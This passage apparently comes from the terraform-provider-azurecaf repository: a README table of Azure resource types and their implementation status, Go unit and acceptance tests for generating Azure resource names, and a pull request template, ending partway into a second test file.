|azurerm_mssql_database_vulnerability_assessment_rule_baseline | ❌ |
|azurerm_mssql_elasticpool | ✔ |
|azurerm_mssql_mi | ✔ |
|azurerm_mssql_server | ✔ |
|azurerm_mssql_server_extended_auditing_policy | ❌ |
|azurerm_mssql_server_security_alert_policy | ❌ |
|azurerm_mssql_server_vulnerability_assessment | ❌ |
|azurerm_mssql_virtual_machine | ❌ |
|azurerm_mysql_active_directory_administrator | ❌ |
|azurerm_mysql_configuration | ❌ |
|azurerm_mysql_database | ✔ |
|azurerm_mysql_firewall_rule | ✔ |
|azurerm_mysql_flexible_server | ✔ |
|azurerm_mysql_flexible_server_database | ✔ |
|azurerm_mysql_flexible_server_firewall_rule | ✔ |
|azurerm_mysql_server | ✔ |
|azurerm_mysql_server_key | ❌ |
|azurerm_mysql_virtual_network_rule | ✔ |
|azurerm_nat_gateway | ❌ |
|azurerm_nat_gateway_public_ip_association | ❌ |
|azurerm_netapp_account | ✔ |
|azurerm_netapp_pool | ✔ |
|azurerm_netapp_snapshot | ✔ |
|azurerm_netapp_volume | ✔ |
|azurerm_network_connection_monitor | ❌ |
|azurerm_network_ddos_protection_plan | ❌ |
|azurerm_network_interface | ✔ |
|azurerm_network_interface_application_gateway_backend_address_pool_association | ❌ |
|azurerm_network_interface_application_security_group_association | ❌ |
|azurerm_network_interface_backend_address_pool_association | ❌ |
|azurerm_network_interface_nat_rule_association | ❌ |
|azurerm_network_interface_security_group_association | ❌ |
|azurerm_network_packet_capture | ❌ |
|azurerm_network_profile | ❌ |
|azurerm_network_security_group | ✔ |
|azurerm_network_security_rule | ✔ |
|azurerm_network_service_tags | ❌ |
|azurerm_network_watcher | ✔ |
|azurerm_network_watcher_flow_log | ❌ |
|azurerm_nginx_deployment | ✔ |
|azurerm_notification_hub | ✔ |
|azurerm_notification_hub_authorization_rule | ✔ |
|azurerm_notification_hub_namespace | ✔ |
|azurerm_orchestrated_virtual_machine_scale_set | ❌ |
|azurerm_packet_capture | ❌ |
|azurerm_platform_image | ❌ |
|azurerm_point_to_site_vpn_gateway | ✔ |
|azurerm_policy_assignment | ❌ |
|azurerm_policy_definition | ❌ |
|azurerm_policy_remediation | ❌ |
|azurerm_policy_set_definition | ❌ |
|azurerm_postgresql_active_directory_administrator | ❌ |
|azurerm_postgresql_configuration | ❌ |
|azurerm_postgresql_database | ✔ |
|azurerm_postgresql_firewall_rule | ✔ |
|azurerm_postgresql_flexible_server | ✔ |
|azurerm_postgresql_flexible_server_configuration | ❌ |
|azurerm_postgresql_flexible_server_database | ✔ |
|azurerm_postgresql_flexible_server_firewall_rule | ✔ |
|azurerm_postgresql_server | ✔ |
|azurerm_postgresql_server_key | ❌ |
|azurerm_postgresql_virtual_network_rule | ✔ |
|azurerm_powerbi_embedded | ✔ |
|azurerm_private_dns_a_record | ❌ |
|azurerm_private_dns_aaaa_record | ❌ |
|azurerm_private_dns_cname_record | ❌ |
|azurerm_private_dns_mx_record | ❌ |
|azurerm_private_dns_ptr_record | ❌ |
|azurerm_private_dns_resolver | ✔ |
|azurerm_private_dns_resolver_dns_forwarding_ruleset | ✔ |
|azurerm_private_dns_resolver_forwarding_rule | ✔ |
|azurerm_private_dns_resolver_inbound_endpoint | ✔ |
|azurerm_private_dns_resolver_outbound_endpoint | ✔ |
|azurerm_private_dns_resolver_virtual_network_link | ✔ |
|azurerm_private_dns_srv_record | ❌ |
|azurerm_private_dns_txt_record | ❌ |
|azurerm_private_dns_zone | ✔ |
|azurerm_private_dns_zone_virtual_network_link | ✔ |
|azurerm_private_endpoint | ✔ |
|azurerm_private_endpoint_connection | ❌ |
|azurerm_private_link_service | ❌ |
|azurerm_private_link_service_endpoint_connections | ❌ |
|azurerm_proximity_placement_group | ❌ |
|azurerm_public_ip | ✔ |
|azurerm_public_ip_prefix | ✔ |
|azurerm_public_ips | ❌ |
|azurerm_purview_account | ✔ |
|azurerm_recovery_services_vault | ✔ |
|azurerm_redhat_openshift_cluster | ✔ |
|azurerm_redhat_openshift_domain | ✔ |
|azurerm_redis_cache | ✔ |
|azurerm_redis_firewall_rule | ✔ |
|azurerm_redis_linked_server | ❌ |
|azurerm_relay_hybrid_connection | ✔ |
|azurerm_relay_namespace | ✔ |
|azurerm_resource_group | ✔ |
|azurerm_resource_group_policy_assignment | ✔ |
|azurerm_resource_group_template_deployment | ❌ |
|azurerm_role_assignment | ✔ |
|azurerm_role_definition | ✔ |
|azurerm_route | ✔ |
|azurerm_route_filter | ❌ |
|azurerm_route_table | ✔ |
|azurerm_search_service | ❌ |
|azurerm_security_center_auto_provisioning | ❌ |
|azurerm_security_center_automation | ❌ |
|azurerm_security_center_contact | ❌ |
|azurerm_security_center_setting | ❌ |
|azurerm_security_center_subscription_pricing | ❌ |
|azurerm_security_center_workspace | ❌ |
|azurerm_sentinel_alert_rule | ❌ |
|azurerm_sentinel_alert_rule_ms_security_incident | ❌ |
|azurerm_sentinel_alert_rule_scheduled | ❌ |
|azurerm_service_fabric_cluster | ✔ |
|azurerm_service_fabric_mesh_application | ❌ |
|azurerm_service_fabric_mesh_local_network | ❌ |
|azurerm_service_fabric_mesh_secret | ❌ |
|azurerm_service_fabric_mesh_secret_value | ❌ |
|azurerm_servicebus_namespace | ✔ |
|azurerm_servicebus_namespace_authorization_rule | ✔ |
|azurerm_servicebus_namespace_network_rule_set | ❌ |
|azurerm_servicebus_queue | ✔ |
|azurerm_servicebus_queue_authorization_rule | ✔ |
|azurerm_servicebus_subscription | ✔ |
|azurerm_servicebus_subscription_rule | ✔ |
|azurerm_servicebus_topic | ✔ |
|azurerm_servicebus_topic_authorization_rule | ✔ |
|azurerm_shared_image | ✔ |
|azurerm_shared_image_gallery | ✔ |
|azurerm_shared_image_version | ❌ |
|azurerm_shared_image_versions | ❌ |
|azurerm_signalr_service | ✔ |
|azurerm_site_recovery_fabric | ❌ |
|azurerm_site_recovery_network_mapping | ❌ |
|azurerm_site_recovery_protection_container | ❌ |
|azurerm_site_recovery_protection_container_mapping | ❌ |
|azurerm_site_recovery_replicated_vm | ❌ |
|azurerm_site_recovery_replication_policy | ❌ |
|azurerm_snapshot | ❌ |
|azurerm_spatial_anchors_account | ❌ |
|azurerm_spring_cloud_app | ❌ |
|azurerm_spring_cloud_certificate | ❌ |
|azurerm_spring_cloud_service | ❌ |
|azurerm_sql_active_directory_administrator | ❌ |
|azurerm_sql_database | ❌ |
|azurerm_sql_elasticpool | ✔ |
|azurerm_sql_failover_group | ✔ |
|azurerm_sql_firewall_rule | ✔ |
|azurerm_sql_server | ✔ |
|azurerm_sql_virtual_network_rule | ❌ |
|azurerm_static_site | ✔ |
|azurerm_storage_account | ✔ |
|azurerm_storage_account_blob_container_sas | ❌ |
|azurerm_storage_account_customer_managed_key | ❌ |
|azurerm_storage_account_network_rules | ❌ |
|azurerm_storage_account_sas | ❌ |
|azurerm_storage_blob | ✔ |
|azurerm_storage_container | ✔ |
|azurerm_storage_data_lake_gen2_filesystem | ✔ |
|azurerm_storage_data_lake_gen2_path | ❌ |
|azurerm_storage_encryption_scope | ❌ |
|azurerm_storage_management_policy | ❌ |
|azurerm_storage_queue | ✔ |
|azurerm_storage_share | ✔ |
|azurerm_storage_share_directory | ✔ |
|azurerm_storage_sync | ✔ |
|azurerm_storage_sync_group | ✔ |
|azurerm_storage_table | ✔ |
|azurerm_storage_table_entity | ❌ |
|azurerm_stream_analytics_function_javascript_udf | ✔ |
|azurerm_stream_analytics_job | ✔ |
|azurerm_stream_analytics_output_blob | ✔ |
|azurerm_stream_analytics_output_eventhub | ✔ |
|azurerm_stream_analytics_output_mssql | ✔ |
|azurerm_stream_analytics_output_servicebus_queue | ✔ |
|azurerm_stream_analytics_output_servicebus_topic | ✔ |
|azurerm_stream_analytics_reference_input_blob | ✔ |
|azurerm_stream_analytics_stream_input_blob | ✔ |
|azurerm_stream_analytics_stream_input_eventhub | ✔ |
|azurerm_stream_analytics_stream_input_iothub | ✔ |
|azurerm_subnet | ✔ |
|azurerm_subnet_nat_gateway_association | ❌ |
|azurerm_subnet_network_security_group_association | ❌ |
|azurerm_subnet_route_table_association | ❌ |
|azurerm_subscription | ❌ |
|azurerm_subscription_policy_assignment | ✔ |
|azurerm_subscription_template_deployment | ❌ |
|azurerm_subscriptions | ❌ |
|azurerm_synapse_firewall_rule | ✔ |
|azurerm_synapse_integration_runtime_azure | ✔ |
|azurerm_synapse_integration_runtime_self_hosted | ✔ |
|azurerm_synapse_linked_service | ✔ |
|azurerm_synapse_managed_private_endpoint | ✔ |
|azurerm_synapse_private_link_hub | ✔ |
|azurerm_synapse_role_assignment | ❌ |
|azurerm_synapse_spark_pool | ✔ |
|azurerm_synapse_sql_pool | ✔ |
|azurerm_synapse_sql_pool_vulnerability_assessment_baseline | ✔ |
|azurerm_synapse_sql_pool_workload_classifier | ✔ |
|azurerm_synapse_sql_pool_workload_group | ✔ |
|azurerm_synapse_workspace | ✔ |
|azurerm_template_deployment | ✔ |
|azurerm_traffic_manager_endpoint | ❌ |
|azurerm_traffic_manager_geographical_location | ❌ |
|azurerm_traffic_manager_profile | ✔ |
|azurerm_user_assigned_identity | ✔ |
|azurerm_virtual_desktop_application_group | ✔ |
|azurerm_virtual_desktop_host_pool | ✔ |
|azurerm_virtual_desktop_workspace | ✔ |
|azurerm_virtual_desktop_workspace_application_group_association | ❌ |
|azurerm_virtual_hub | ✔ |
|azurerm_virtual_hub_bgp_connection | ❌ |
|azurerm_virtual_hub_connection | ✔ |
|azurerm_virtual_hub_ip | ❌ |
|azurerm_virtual_hub_route_table | ❌ |
|azurerm_virtual_hub_security_partner_provider | ❌ |
|azurerm_virtual_machine | ✔ |
|azurerm_virtual_machine_data_disk_attachment | ❌ |
|azurerm_virtual_machine_extension | ❌ |
|azurerm_virtual_machine_scale_set | ✔ |
|azurerm_virtual_machine_scale_set_extension | ❌ |
|azurerm_virtual_network | ✔ |
|azurerm_virtual_network_gateway | ✔ |
|azurerm_virtual_network_gateway_connection | ❌ |
|azurerm_virtual_network_peering | ✔ |
|azurerm_virtual_wan | ✔ |
|azurerm_vmware_cluster | ✔ |
|azurerm_vmware_express_route_authorization | ✔ |
|azurerm_vmware_private_cloud | ✔ |
|azurerm_vpn_gateway | ❌ |
|azurerm_vpn_gateway_connection | ✔ |
|azurerm_vpn_server_configuration | ❌ |
|azurerm_vpn_site | ✔ |
|azurerm_web_application_firewall_policy | ✔ |
|azurerm_web_pubsub | ✔ |
|azurerm_web_pubsub_hub | ✔ |
|azurerm_windows_virtual_machine | ✔ |
|azurerm_windows_virtual_machine_scale_set | ✔ |
|azurerm_windows_web_app | ✔ |
|azurerm_windows_web_app_slot | ⚠ |
❌ = Not yet implemented
✔ = Already implemented
⚠ = Will not be implemented
<file_sep>/azurecaf/resource_name_test.go
package azurecaf
import (
"context"
"reflect"
"regexp"
"testing"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema"
)
// setData assembles a schema.ResourceData fixture carrying the common
// azurecaf_name arguments (name, prefixes, suffixes, clean_input) for use
// by the unit tests in this file.
func setData(prefixes []string, name string, suffixes []string, cleanInput bool) *schema.ResourceData {
	d := &schema.ResourceData{}
	// Errors from Set are deliberately discarded: this helper only builds
	// in-memory test fixtures.
	_ = d.Set("name", name)
	_ = d.Set("prefixes", prefixes)
	_ = d.Set("suffixes", suffixes)
	_ = d.Set("clean_input", cleanInput)
	return d
}
// TestCleanInput_no_changes verifies that an input made only of allowed
// characters passes through cleanString unchanged for the resource group
// definition.
func TestCleanInput_no_changes(t *testing.T) {
	input := "testdata"
	def := ResourceDefinitions["azurerm_resource_group"]
	if got := cleanString(input, &def); got != input {
		t.Errorf("Expected %s but received %s", input, got)
	}
}
// TestCleanInput_remove_always verifies that characters outside the
// allowed set (emoji in this fixture) are stripped by cleanString.
func TestCleanInput_remove_always(t *testing.T) {
	const (
		input    = "🐱🚀testdata😊"
		expected = "testdata"
	)
	def := ResourceDefinitions["azurerm_resource_group"]
	if got := cleanString(input, &def); got != expected {
		t.Errorf("Expected %s but received %s", expected, got)
	}
}
// TestCleanInput_not_remove_special_allowed_chars verifies that special
// characters permitted by the resource group definition, such as
// parentheses, survive cleanString.
func TestCleanInput_not_remove_special_allowed_chars(t *testing.T) {
	const (
		input    = "testdata()"
		expected = "testdata()"
	)
	def := ResourceDefinitions["azurerm_resource_group"]
	if got := cleanString(input, &def); got != expected {
		t.Errorf("Expected %s but received %s", expected, got)
	}
}
// TestCleanSplice_no_changes verifies that cleanSlice leaves a slice of
// already-valid strings untouched for the resource group definition.
func TestCleanSplice_no_changes(t *testing.T) {
	data := []string{"testdata", "test", "data"}
	resource := ResourceDefinitions["azurerm_resource_group"]
	result := cleanSlice(data, &resource)
	// Compare the whole slice (length included) instead of element by
	// element: the previous loop would panic on a shorter result and
	// silently pass on a longer one.
	if !reflect.DeepEqual(data, result) {
		t.Errorf("Expected %v but received %v", data, result)
	}
}
// TestConcatenateParameters_azurerm_public_ip_prefix verifies that
// concatenateParameters joins prefixes, content and suffixes, in that
// order, using the given separator.
func TestConcatenateParameters_azurerm_public_ip_prefix(t *testing.T) {
	const expected = "pre-name-ip-suf"
	got := concatenateParameters("-", []string{"pre"}, []string{"name", "ip"}, []string{"suf"})
	if got != expected {
		t.Errorf("Expected %s but received %s", expected, got)
	}
}
func TestGetSlug(t *testing.T) {
resourceType := "azurerm_resource_group"
convention := ConventionCafClassic
result := getSlug(resourceType, convention)
expected := "rg"
if result != expected {
t.Errorf("Expected %s but received %s", expected, result)
}
}
func TestGetSlug_unknown(t *testing.T) {
resourceType := "azurerm_does_not_exist"
convention := ConventionCafClassic
result := getSlug(resourceType, convention)
expected := ""
if result != expected {
t.Errorf("Expected %s but received %s", expected, result)
}
}
// TestAccResourceName_CafClassic exercises the azurecaf_name resource with
// the CAF classic convention against the shared HCL fixture
// testAccResourceNameCafClassicConfig. Every step re-applies the same
// configuration and asserts, for one named resource, the expected generated
// string (or its prefix), the expected length, and that the result matches
// the validation regex of the target azurerm resource type.
func TestAccResourceName_CafClassic(t *testing.T) {
	resource.UnitTest(t, resource.TestCase{
		PreCheck:     func() { testAccPreCheck(t) },
		Providers:    testAccProviders,
		CheckDestroy: testAccCheckResourceDestroy,
		Steps: []resource.TestStep{
			{
				// Resource group: prefixes "pr1"/"pr2", slug "rg", then the
				// cleaned name and a random suffix.
				Config: testAccResourceNameCafClassicConfig,
				Check: resource.ComposeTestCheckFunc(
					testAccCafNamingValidation(
						"azurecaf_name.classic_rg",
						"pr1-pr2-rg-myrg-",
						29,
						"pr1-pr2"),
					regexMatch("azurecaf_name.classic_rg", regexp.MustCompile(ResourceDefinitions["azurerm_resource_group"].ValidationRegExp), 1),
				),
			},
			{
				// Container app with an invalid input name: clean_input strips
				// the underscores so the result still matches the regex.
				Config: testAccResourceNameCafClassicConfig,
				Check: resource.ComposeTestCheckFunc(
					testAccCafNamingValidation(
						"azurecaf_name.classic_ca_invalid",
						"ca-myinvalidcaname",
						24,
						""),
					regexMatch("azurecaf_name.classic_ca_invalid", regexp.MustCompile(ResourceDefinitions["azurerm_container_app"].ValidationRegExp), 1),
				),
			},
			{
				// Passthrough: the input name is used as-is (cleaned) and must
				// satisfy the container app regex.
				Config: testAccResourceNameCafClassicConfig,
				Check: resource.ComposeTestCheckFunc(
					testAccCafNamingValidation(
						"azurecaf_name.passthrough",
						"passthrough",
						11,
						""),
					regexMatch("azurecaf_name.passthrough", regexp.MustCompile(ResourceDefinitions["azurerm_container_app"].ValidationRegExp), 1),
				),
			},
			{
				// Container app environment with an invalid input name.
				Config: testAccResourceNameCafClassicConfig,
				Check: resource.ComposeTestCheckFunc(
					testAccCafNamingValidation(
						"azurecaf_name.classic_cae_invalid",
						"cae-myinvalidcaename",
						26,
						""),
					regexMatch("azurecaf_name.classic_cae_invalid", regexp.MustCompile(ResourceDefinitions["azurerm_container_app_environment"].ValidationRegExp), 1),
				),
			},
			{
				// Same passthrough value checked against the container app
				// environment regex.
				Config: testAccResourceNameCafClassicConfig,
				Check: resource.ComposeTestCheckFunc(
					testAccCafNamingValidation(
						"azurecaf_name.passthrough",
						"passthrough",
						11,
						""),
					regexMatch("azurecaf_name.passthrough", regexp.MustCompile(ResourceDefinitions["azurerm_container_app_environment"].ValidationRegExp), 1),
				),
			},
			{
				// Container registry: separators are not allowed, so prefixes,
				// slug and name are concatenated without dashes.
				Config: testAccResourceNameCafClassicConfig,
				Check: resource.ComposeTestCheckFunc(
					testAccCafNamingValidation(
						"azurecaf_name.classic_acr_invalid",
						"pr1pr2crmyinvalidacrname",
						35,
						"pr1pr2"),
					regexMatch("azurecaf_name.classic_acr_invalid", regexp.MustCompile(ResourceDefinitions["azurerm_container_registry"].ValidationRegExp), 1),
				),
			},
			{
				// Same passthrough value checked against the container
				// registry regex.
				Config: testAccResourceNameCafClassicConfig,
				Check: resource.ComposeTestCheckFunc(
					testAccCafNamingValidation(
						"azurecaf_name.passthrough",
						"passthrough",
						11,
						""),
					regexMatch("azurecaf_name.passthrough", regexp.MustCompile(ResourceDefinitions["azurerm_container_registry"].ValidationRegExp), 1),
				),
			},
			{
				// API Management: prefix + slug + name, no random suffix
				// (random_length = 0 in the fixture).
				Config: testAccResourceNameCafClassicConfig,
				Check: resource.ComposeTestCheckFunc(
					testAccCafNamingValidation(
						"azurecaf_name.apim",
						"vsic-apim-apim",
						14,
						"vsic"),
					regexMatch("azurecaf_name.apim", regexp.MustCompile(ResourceDefinitions["azurerm_api_management_service"].ValidationRegExp), 1),
				),
			},
		},
	})
}
// TestAccResourceName_CafClassicRSV exercises the azurecaf_name resource
// for a recovery services vault using the fixture
// testAccResourceNameCafClassicConfigRsv: prefix "pr1", slug "rsv", name
// "test", a 2-character random suffix and suffix "su1", validated against
// the vault's regex.
func TestAccResourceName_CafClassicRSV(t *testing.T) {
	resource.UnitTest(t, resource.TestCase{
		PreCheck:     func() { testAccPreCheck(t) },
		Providers:    testAccProviders,
		CheckDestroy: testAccCheckResourceDestroy,
		Steps: []resource.TestStep{
			{
				Config: testAccResourceNameCafClassicConfigRsv,
				Check: resource.ComposeTestCheckFunc(
					testAccCafNamingValidation(
						"azurecaf_name.rsv",
						"pr1-rsv-test-gm-su1",
						19,
						""),
					regexMatch("azurecaf_name.rsv", regexp.MustCompile(ResourceDefinitions["azurerm_recovery_services_vault"].ValidationRegExp), 1),
				),
			},
		},
	})
}
// TestComposeName verifies composeName when the full result fits the
// 21-character budget: prefixes, slug, name, random part and suffixes are
// all kept and joined by the separator.
// Uses t.Errorf instead of the previous t.Logf+t.Fail pair, consistent
// with the other tests in this file.
func TestComposeName(t *testing.T) {
	namePrecedence := []string{"name", "random", "slug", "suffixes", "prefixes"}
	prefixes := []string{"a", "b"}
	suffixes := []string{"c", "d"}
	name := composeName("-", prefixes, "name", "slug", suffixes, "rd", 21, namePrecedence)
	expected := "a-b-slug-name-rd-c-d"
	if name != expected {
		t.Errorf("Fail to generate name expected %s received %s", expected, name)
	}
}
// TestComposeNameCutCorrect verifies that when the budget (19 chars) is
// too small for everything, composeName drops the lowest-precedence
// component first: the expected value no longer contains prefix "a".
// Uses t.Errorf instead of t.Logf+t.Fail for consistency.
func TestComposeNameCutCorrect(t *testing.T) {
	namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
	prefixes := []string{"a", "b"}
	suffixes := []string{"c", "d"}
	name := composeName("-", prefixes, "name", "slug", suffixes, "rd", 19, namePrecedence)
	expected := "b-slug-name-rd-c-d"
	if name != expected {
		t.Errorf("Fail to generate name expected %s received %s", expected, name)
	}
}
// TestComposeNameCutMaxLength verifies that when the name alone consumes
// the whole budget (10 chars) the slug is dropped entirely.
// Uses t.Errorf instead of t.Logf+t.Fail for consistency.
func TestComposeNameCutMaxLength(t *testing.T) {
	namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
	prefixes := []string{}
	suffixes := []string{}
	name := composeName("-", prefixes, "aaaaaaaaaa", "bla", suffixes, "", 10, namePrecedence)
	expected := "aaaaaaaaaa"
	if name != expected {
		t.Errorf("Fail to generate name expected %s received %s", expected, name)
	}
}
// TestComposeNameCutCorrectSuffixes verifies the 15-character budget case:
// both prefixes and the last suffix are dropped, keeping slug, name,
// random part and the first suffix.
// Uses t.Errorf instead of t.Logf+t.Fail for consistency.
func TestComposeNameCutCorrectSuffixes(t *testing.T) {
	namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
	prefixes := []string{"a", "b"}
	suffixes := []string{"c", "d"}
	name := composeName("-", prefixes, "name", "slug", suffixes, "rd", 15, namePrecedence)
	expected := "slug-name-rd-c"
	if name != expected {
		t.Errorf("Fail to generate name expected %s received %s", expected, name)
	}
}
// TestComposeEmptyStringArray verifies that empty strings inside the
// prefix/suffix slices are skipped and do not produce empty segments or
// doubled separators.
// Uses t.Errorf instead of t.Logf+t.Fail for consistency.
func TestComposeEmptyStringArray(t *testing.T) {
	namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
	prefixes := []string{"", "b"}
	suffixes := []string{"", "d"}
	name := composeName("-", prefixes, "", "", suffixes, "", 15, namePrecedence)
	expected := "b-d"
	if name != expected {
		t.Errorf("Fail to generate name expected %s received %s", expected, name)
	}
}
// TestValidResourceType_validParameters verifies that validateResourceType
// accepts a set of resource types that are all supported: it must report
// valid and return no error.
// Uses t.Errorf instead of t.Logf+t.Fail for consistency.
func TestValidResourceType_validParameters(t *testing.T) {
	resourceType := "azurerm_resource_group"
	resourceTypes := []string{"azurerm_container_registry", "azurerm_storage_account"}
	isValid, err := validateResourceType(resourceType, resourceTypes)
	if !isValid {
		t.Errorf("resource types considered invalid while input parameters are valid")
	}
	if err != nil {
		t.Errorf("resource validation generated an unexpected error %s", err.Error())
	}
}
// TestValidResourceType_invalidParameters verifies that
// validateResourceType rejects a set containing an unsupported type: it
// must report invalid and return a non-nil error.
// Fixes the inverted failure message (it fires when NO error was
// generated) and uses t.Errorf for consistency.
func TestValidResourceType_invalidParameters(t *testing.T) {
	resourceType := "azurerm_resource_group"
	resourceTypes := []string{"azurerm_not_supported", "azurerm_storage_account"}
	isValid, err := validateResourceType(resourceType, resourceTypes)
	if isValid {
		t.Errorf("resource types considered valid while input parameters are invalid")
	}
	if err == nil {
		t.Errorf("resource validation did not generate an error while the input is invalid")
	}
}
// TestGetResourceNameValid verifies full CAF classic name generation for a
// resource group: prefixes, the "rg" slug, the name and the random suffix
// joined by "-".
// Uses t.Errorf instead of t.Logf+t.Fail for consistency.
func TestGetResourceNameValid(t *testing.T) {
	namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
	resourceName, err := getResourceName("azurerm_resource_group", "-", []string{"a", "b"}, "myrg", nil, "1234", "cafclassic", true, false, true, namePrecedence)
	expected := "a-b-rg-myrg-1234"
	if err != nil {
		t.Errorf("getResource Name generated an error %s", err.Error())
	}
	if expected != resourceName {
		t.Errorf("invalid name, expected %s got %s", expected, resourceName)
	}
}
// TestGetResourceNameValidRsv verifies CAF classic name generation for a
// recovery services vault, whose slug is "rsv".
// Uses t.Errorf instead of t.Logf+t.Fail for consistency.
func TestGetResourceNameValidRsv(t *testing.T) {
	namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
	resourceName, err := getResourceName("azurerm_recovery_services_vault", "-", []string{"a", "b"}, "test", nil, "1234", "cafclassic", true, false, true, namePrecedence)
	expected := "a-b-rsv-test-1234"
	if err != nil {
		t.Errorf("getResource Name generated an error %s", err.Error())
	}
	if expected != resourceName {
		t.Errorf("invalid name, expected %s got %s", expected, resourceName)
	}
}
// TestGetResourceNameValidNoSlug verifies that disabling the slug (last
// boolean argument false) omits "rg" from the generated name.
// Uses t.Errorf instead of t.Logf+t.Fail for consistency.
func TestGetResourceNameValidNoSlug(t *testing.T) {
	namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
	resourceName, err := getResourceName("azurerm_resource_group", "-", []string{"a", "b"}, "myrg", nil, "1234", "cafclassic", true, false, false, namePrecedence)
	expected := "a-b-myrg-1234"
	if err != nil {
		t.Errorf("getResource Name generated an error %s", err.Error())
	}
	if expected != resourceName {
		t.Errorf("invalid name, expected %s got %s", expected, resourceName)
	}
}
// TestGetResourceNameInvalidResourceType verifies that an unsupported
// resource type produces a validation error and not a generated name.
// Uses t.Errorf instead of t.Logf+t.Fail for consistency.
func TestGetResourceNameInvalidResourceType(t *testing.T) {
	namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
	resourceName, err := getResourceName("azurerm_invalid", "-", []string{"a", "b"}, "myrg", nil, "1234", "cafclassic", true, false, true, namePrecedence)
	expected := "a-b-rg-myrg-1234"
	if err == nil {
		t.Errorf("Expected a validation error, got nil")
	}
	if expected == resourceName {
		t.Errorf("valid name received while an error is expected")
	}
}
// TestGetResourceNamePassthrough verifies that in passthrough mode
// (eighth argument true) the input name is returned unchanged, ignoring
// prefixes, slug and random suffix.
// Fixes the copy-pasted failure message (this is a name-mismatch check,
// no error is expected here) and uses t.Errorf for consistency.
func TestGetResourceNamePassthrough(t *testing.T) {
	namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
	resourceName, _ := getResourceName("azurerm_resource_group", "-", []string{"a", "b"}, "myrg", nil, "1234", "cafclassic", true, true, true, namePrecedence)
	expected := "myrg"
	if expected != resourceName {
		t.Errorf("invalid name, expected %s got %s", expected, resourceName)
	}
}
// testResourceNameStateDataV2 returns a v2 state fixture: an empty state
// map, i.e. one created before the use_slug attribute existed.
func testResourceNameStateDataV2() map[string]interface{} {
	return make(map[string]interface{})
}
// testResourceNameStateDataV3 returns the expected v3 state fixture: the
// v2 state with use_slug present and set to true.
func testResourceNameStateDataV3() map[string]interface{} {
	state := make(map[string]interface{})
	state["use_slug"] = true
	return state
}
// TestResourceExampleInstanceStateUpgradeV2 verifies that upgrading a v2
// state with resourceNameStateUpgradeV2 yields the v3 shape (use_slug
// added with its default).
func TestResourceExampleInstanceStateUpgradeV2(t *testing.T) {
	want := testResourceNameStateDataV3()
	got, err := resourceNameStateUpgradeV2(context.Background(), testResourceNameStateDataV2(), nil)
	if err != nil {
		t.Fatalf("error migrating state: %s", err)
	}
	if !reflect.DeepEqual(want, got) {
		t.Fatalf("\n\nexpected:\n\n%#v\n\ngot:\n\n%#v\n\n", want, got)
	}
}
// testAccResourceNameCafClassicConfig is the HCL fixture shared by every
// step of TestAccResourceName_CafClassic; each azurecaf_name resource
// below maps to one validation in that test.
const testAccResourceNameCafClassicConfig = `
# Resource Group
resource "azurecaf_name" "classic_rg" {
name = "myrg"
resource_type = "azurerm_resource_group"
prefixes = ["pr1", "pr2"]
suffixes = ["su1", "su2"]
random_seed = 1
random_length = 5
clean_input = true
}
resource "azurecaf_name" "classic_ca_invalid" {
name = "my_invalid_ca_name"
resource_type = "azurerm_container_app"
random_seed = 1
random_length = 5
clean_input = true
}
resource "azurecaf_name" "classic_cae_invalid" {
name = "my_invalid_cae_name"
resource_type = "azurerm_container_app_environment"
random_seed = 1
random_length = 5
clean_input = true
}
resource "azurecaf_name" "classic_acr_invalid" {
name = "my_invalid_acr_name"
resource_type = "azurerm_container_registry"
prefixes = ["pr1", "pr2"]
suffixes = ["su1", "su2"]
random_seed = 1
random_length = 5
clean_input = true
}
resource "azurecaf_name" "passthrough" {
name = "passthRough"
resource_type = "azurerm_container_registry"
prefixes = ["pr1", "pr2"]
suffixes = ["su1", "su2"]
random_seed = 1
random_length = 5
clean_input = true
passthrough = true
}
resource "azurecaf_name" "apim" {
name = "apim"
resource_type = "azurerm_api_management_service"
prefixes = ["vsic"]
random_length = 0
clean_input = true
passthrough = false
}
`
// testAccResourceNameCafClassicConfigRsv is the HCL fixture used by
// TestAccResourceName_CafClassicRSV to generate a recovery services vault
// name with a deterministic (seeded) 2-character random suffix.
const testAccResourceNameCafClassicConfigRsv = `
# Resource Group
resource "azurecaf_name" "rsv" {
name = "test"
resource_type = "azurerm_recovery_services_vault"
prefixes = ["pr1"]
suffixes = ["su1"]
random_length = 2
random_seed = 1
clean_input = true
passthrough = false
}
`
<file_sep>/.github/PULL_REQUEST_TEMPLATE.md
# [Issue-id](https://github.com/aztfmod/terraform-provider-azurecaf/issues/ISSUE-ID-GOES-HERE)
## PR Checklist
---
<!-- Use the check list below to ensure your branch is ready for PR. -->
- [ ] I have read the [CONTRIBUTING.MD instructions](./CONTRIBUTING.md)
- [ ] I have changed the `resourceDefinition.json`
- [ ] I have generated the resource model (there's a `models_generated.go` file in my PR)
- [ ] I have updated the [README.md#resource-status](../README.md)
- [ ] I have checked that there are no other open Pull Requests for the same update/change
## Description
<!-- Concise description of the problem and the solution or the feature being added -->
## Does this introduce a breaking change
- [ ] YES
- [ ] NO
<!-- If this introduces a breaking change, please describe the impact and migration path for existing applications below. -->
## Testing
<!-- Instructions for testing and validation of your code -->
<file_sep>/azurecaf/resource_naming_convention_random_test.go
package azurecaf
import (
"regexp"
"testing"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
)
// TestAccCafNamingConventionFull_Random exercises the legacy
// azurecaf_naming_convention resource with the "random" convention for a
// range of resource types. For each resource it validates the expected
// prefix and maximum length of the generated value, and matches it against
// the resource type's validation regex.
// Fix: the original contained a copy-paste artifact that validated
// random_aksnpw twice, pairing the first occurrence with a duplicate
// regexMatch of random_aksnpl; the mismatched duplicate pair is removed.
func TestAccCafNamingConventionFull_Random(t *testing.T) {
	resource.UnitTest(t, resource.TestCase{
		PreCheck:     func() { testAccPreCheck(t) },
		Providers:    testAccProviders,
		CheckDestroy: testAccCheckResourceDestroy,
		Steps: []resource.TestStep{
			{
				Config: testAccResourceRandomConfig,
